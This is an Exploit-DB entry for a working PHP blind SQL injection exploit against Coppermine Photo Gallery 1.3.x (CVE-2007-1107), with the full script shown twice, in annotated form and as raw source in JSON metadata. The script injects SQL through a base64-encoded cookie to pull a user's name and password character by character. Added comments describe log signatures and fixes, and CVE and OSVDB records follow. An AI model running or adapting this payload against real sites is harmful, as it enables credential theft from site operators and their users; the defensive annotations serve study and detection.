ID EDB-ID:3371
Type exploitdb
Reporter s0cratex
Modified 2007-02-24T00:00:00
Description
Coppermine Photo Gallery 1.3.x Remote Blind SQL Injection Exploit. CVE-2007-1107. Webapps exploit for php platform
<?
# Coppermine Photo Gallery 1.3.x Blind SQL Injection Exploit
# by s0cratex, RTM Member
# Visit: www.zonartm.org
/*
You need make a small work... Add a fav pic, enter to the site and add
/addfav.php?pid=2 for example..xD
... in the line: if(eregi("download",fgets($cnx2))){ $pass.=chr($i); echo
chr($i); break; } }
the word "download" depends of the language...
*/
# saludos a rgod, OpTix, crypkey 'n mechas...
# Runtime setup: hide PHP errors, remove the script time limit and give
# every socket operation a 5 second default timeout.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
# Connection settings as published: a gallery under /cpg on localhost, port 80.
$host = "localhost"; $path = "/cpg"; $port = "80";
# user_id of the cpg131_users row whose columns the queries below read.
$id = "1";
# Banner printed before any request is sent.
echo "Coppermine Photo Gallery 1.3.x fav Blind SQL Injection Exploit\n";
echo "--------------------------------------------------------------\n";
echo "\n";
# Stage 1: read cpg131_users.user_name for user_id=$id one character at a
# time, using the page content as a true/false oracle (blind SQL injection,
# CVE-2007-1107 per the advisory data on this page).
#
# Defender's view: every guess is a separate HTTP/1.0 GET to
# thumbnails.php?album=favpics that differs only in the cpg131_fav cookie,
# so a run appears in access logs as a dense burst of near-identical requests
# from one client. The cookie base64-decodes to a serialized one-element
# array whose string holds SQL keywords (SELECT, SUBSTRING, ASCII) instead of
# what is presumably a list of favourite picture ids; that decoded content is
# a usable detection signature. The root cause is server-side: the cookie
# value evidently reaches a SQL statement unvalidated, so the fix belongs in
# the application (integer-only validation / parameterized queries, or a
# release that addresses CVE-2007-1107), not in cookie filtering alone.
echo "Username -> ";
# $j is the 1-based character position, $user collects the recovered bytes.
$j = 1; $user = "";
# The outer loop runs until a NUL byte (chr(0)) has been appended to $user.
while(!strstr($user,chr(0))){
# Candidate byte values 0..254 are tried for position $j.
for($x=0;$x<255;$x++){
# SQL fragment that evaluates to true only when the character at position $j
# has ASCII code $x; the table name assumes the cpg131_ prefix.
$xpl = "'') OR 1=(SELECT (IF((ASCII(SUBSTRING(user_name,".$j.",1))=".$x."),1,0)) FROM cpg131_users WHERE user_id=".$id.")/*";
# Wrap the fragment in PHP serialize() syntax for an array with one string.
$xpl = "a:1:{i:0;s:".strlen($xpl).":\"".$xpl."\";}";
# The cookie value is sent base64-encoded.
$xpl = base64_encode($xpl);
# One new TCP connection per guess; the fsockopen() result is not checked.
$cnx = fsockopen($host,$port);
fwrite($cnx, "GET ".$path."/thumbnails.php?album=favpics HTTP/1.0\r\nCookie: cpg131_fav=".$xpl."\r\n\r\n");
# Oracle: a response line matching "download" (case-insensitive) counts as a
# true answer; the author's header note says this word depends on the
# gallery's language. This break leaves only the response-reading loop.
while(!feof($cnx)){
if(eregi("download",fgets($cnx))){ $user.=chr($x); echo chr($x); break; } }
fclose($cnx);
# die() with "Try again..." is called if $x equals 255 at this point.
if ($x==255) {
die("\n Try again..."); }
}
# Move on to the next character position.
$j++;
}
# Stage 2: read cpg131_users.user_password for user_id=$id one character at
# a time through the same cookie-borne boolean oracle. The page does not
# show what format the stored value has.
#
# Defender's view: the traffic has the same shape as any run of this script,
# i.e. one HTTP/1.0 GET to thumbnails.php?album=favpics per guess, each with
# a different base64 cpg131_fav cookie that decodes to a serialized string
# containing SQL. Because the value read here is a credential column, a
# gallery that shows this pattern in its logs should treat the stored
# passwords as exposed and reset them after the application is fixed.
echo "\n";
echo "Password -> ";
# $a is the 1-based character position, $pass collects the recovered bytes.
$a = 1; $pass = "";
# The outer loop runs until a NUL byte (chr(0)) has been appended to $pass.
while(!strstr($pass,chr(0))){
# Candidate byte values 0..254 are tried for position $a.
for($i=0;$i<255;$i++){
# SQL fragment that evaluates to true only when the character at position $a
# has ASCII code $i; the table name assumes the cpg131_ prefix.
$xpl = "'') OR 1=(SELECT (IF((ASCII(SUBSTRING(user_password,".$a.",1))=".$i."),1,0)) FROM cpg131_users WHERE user_id=".$id.")/*";
# Wrap the fragment in PHP serialize() syntax for an array with one string.
$xpl = "a:1:{i:0;s:".strlen($xpl).":\"".$xpl."\";}";
# The cookie value is sent base64-encoded.
$xpl = base64_encode($xpl);
# One new TCP connection per guess; the fsockopen() result is not checked.
$cnx2 = fsockopen($host,$port);
fwrite($cnx2, "GET ".$path."/thumbnails.php?album=favpics HTTP/1.0\r\nCookie: cpg131_fav=".$xpl."\r\n\r\n");
# Oracle: a response line matching "download" (case-insensitive) counts as a
# true answer. This break leaves only the response-reading loop.
while(!feof($cnx2)){
if(eregi("download",fgets($cnx2))){ $pass.=chr($i); echo chr($i); break; }
}
fclose($cnx2);
# die() with "Try again..." is called if $i equals 255 at this point.
if ($i==255) {
die("\n Try again..."); }
}
# Move on to the next character position.
$a++;
}
# Closing banner: author contact and site credits only; no further requests
# are made after this point.
echo "--------------------------------------------------------------\n";
echo "s0cratex@zonartm.org || if you speak spanish->MSN: s0cratex@hotmail.com ..xD\n";
echo "www.zonartm.org/blog/s0cratex\n";
echo "plexinium.com comming soon <- Hacking Nica\n";
?>
# milw0rm.com [2007-02-24]
{"bulletinFamily": "exploit", "id": "EDB-ID:3371", "cvelist": ["CVE-2007-1107"], "modified": "2007-02-24T00:00:00", "lastseen": "2016-01-31T18:19:48", "edition": 1, "sourceData": "<?\n# Coppermine Photo Gallery 1.3.x Blind SQL Injection Exploit\n# by s0cratex, RTM Member\n# Visit: www.zonartm.org\n\n/*\nYou need make a small work... Add a fav pic, enter to the site and add\n/addfav.php?pid=2 for example..xD\n... in the line: if(eregi(\"download\",fgets($cnx2))){ $pass.=chr($i); echo\nchr($i); break; } }\nthe word \"download\" depends of the language...\n*/\n\n# saludos a rgod, OpTix, crypkey 'n mechas...\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\n$host = \"localhost\"; $path = \"/cpg\"; $port = \"80\";\n$id = \"1\";\n\necho \"Coppermine Photo Gallery 1.3.x fav Blind SQL Injection Exploit\\n\";\necho \"--------------------------------------------------------------\\n\";\necho \"\\n\";\necho \"Username -> \";\n$j = 1; $user = \"\";\nwhile(!strstr($user,chr(0))){\nfor($x=0;$x<255;$x++){\n$xpl = \"'') OR 1=(SELECT (IF((ASCII(SUBSTRING(user_name,\".$j.\",1))=\".$x.\"),1,0)) FROM cpg131_users WHERE user_id=\".$id.\")/*\";\n$xpl = \"a:1:{i:0;s:\".strlen($xpl).\":\\\"\".$xpl.\"\\\";}\";\n$xpl = base64_encode($xpl);\n$cnx = fsockopen($host,$port);\nfwrite($cnx, \"GET \".$path.\"/thumbnails.php?album=favpics HTTP/1.0\\r\\nCookie: cpg131_fav=\".$xpl.\"\\r\\n\\r\\n\");\nwhile(!feof($cnx)){\nif(eregi(\"download\",fgets($cnx))){ $user.=chr($x); echo chr($x); break; } }\nfclose($cnx);\nif ($x==255) {\ndie(\"\\n Try again...\"); }\n}\n$j++;\n}\necho \"\\n\";\necho \"Password -> \";\n$a = 1; $pass = \"\";\nwhile(!strstr($pass,chr(0))){\nfor($i=0;$i<255;$i++){\n$xpl = \"'') OR 1=(SELECT (IF((ASCII(SUBSTRING(user_password,\".$a.\",1))=\".$i.\"),1,0)) FROM cpg131_users WHERE user_id=\".$id.\")/*\";\n$xpl = \"a:1:{i:0;s:\".strlen($xpl).\":\\\"\".$xpl.\"\\\";}\";\n$xpl = base64_encode($xpl);\n$cnx2 = 
fsockopen($host,$port);\nfwrite($cnx2, \"GET \".$path.\"/thumbnails.php?album=favpics HTTP/1.0\\r\\nCookie: cpg131_fav=\".$xpl.\"\\r\\n\\r\\n\");\nwhile(!feof($cnx2)){\nif(eregi(\"download\",fgets($cnx2))){ $pass.=chr($i); echo chr($i); break; }\n}\nfclose($cnx2);\nif ($i==255) {\ndie(\"\\n Try again...\"); }\n}\n$a++;\n}\necho \"--------------------------------------------------------------\\n\";\necho \"s0cratex@zonartm.org || if you speak spanish->MSN: s0cratex@hotmail.com ..xD\\n\";\necho \"www.zonartm.org/blog/s0cratex\\n\";\necho \"plexinium.com comming soon <- Hacking Nica\\n\";\n?>\n\n# milw0rm.com [2007-02-24]\n", "published": "2007-02-24T00:00:00", "href": "https://www.exploit-db.com/exploits/3371/", "osvdbidlist": ["33133"], "reporter": "s0cratex", "hash": "de863f2210df24338c114d74065a5d2d11b8d2ee8dccf454f52a47e511e8af71", "title": "Coppermine Photo Gallery 1.3.x - Remote Blind SQL Injection Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Coppermine Photo Gallery 1.3.x Remote Blind SQL Injection Exploit. CVE-2007-1107. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3371/", "viewCount": 1, "enchantments": {"vulnersScore": 7.7}}
{"result": {"cve": [{"id": "CVE-2007-1107", "type": "cve", "title": "CVE-2007-1107", "description": "SQL injection vulnerability in thumbnails.php in Coppermine Photo Gallery (CPG) 1.3.x allows remote authenticated users to execute arbitrary SQL commands via a cpg131_fav cookie. NOTE: it was later reported that 1.4.10, 1.4.14, and other 1.4.x versions are also affected using similar cookies.", "published": "2007-02-26T12:28:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1107", "cvelist": ["CVE-2007-1107"], "lastseen": "2017-10-11T11:07:01"}], "osvdb": [{"id": "OSVDB:33133", "type": "osvdb", "title": "Coppermine Photo Gallery thumbnails.php cpg131_fav Cookie Parameter SQL Injection", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0469.html\nISS X-Force ID: 32688\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3371\n[CVE-2007-1107](https://vulners.com/cve/CVE-2007-1107)\nBugtraq ID: 22709\n", "published": "2007-02-24T07:19:32", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:33133", "cvelist": ["CVE-2007-1107"], "lastseen": "2017-04-28T13:20:29"}]}}